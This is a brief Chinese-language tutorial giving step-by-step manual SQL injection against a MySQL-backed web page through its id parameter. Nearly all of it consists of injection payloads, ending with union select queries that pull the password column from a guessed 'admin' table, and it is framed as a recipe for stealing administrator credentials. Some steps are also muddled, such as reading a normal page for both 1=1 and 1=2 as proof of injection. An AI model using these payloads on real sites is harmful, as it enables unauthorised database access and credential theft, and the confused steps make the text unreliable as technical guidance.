1.输入正确地址
在地址栏输入地址且在问号处加上id=1
2.探测是否有注入漏洞
在地址栏后加入and 1=1 或者1=2,若页面无异常,表示存在注入
3.确定MySQL的版本
在地址后加上 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
4.判断数据库连接账号有没有写权限
在网址后加入and (select count(*) from mysql.user)>0,若返回正确则有权限,返回错误需要重新猜管理员名称和密码
5.猜测管理员表
在网址后加union select count(*)from admin,判断管理员表是否叫admin,如果返回正常,说明存在这个表;若返回错误,则需要重新猜测表名。
6.猜测数据表中字段数量
在网址后加 and 1=1 union select 1,2,3,….,n。前面的and 1=1或1=2都可以,主要是为了连接后面的union语句;后面的1,2,3,….n主要用于标记有几个字段,如果字段不符合,就会报错。
7.猜测字段名
在网址后加入and 1=1 union select 1,password,3 from admin猜测是否有password字段,如果有则显示其内容,没有则报错
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理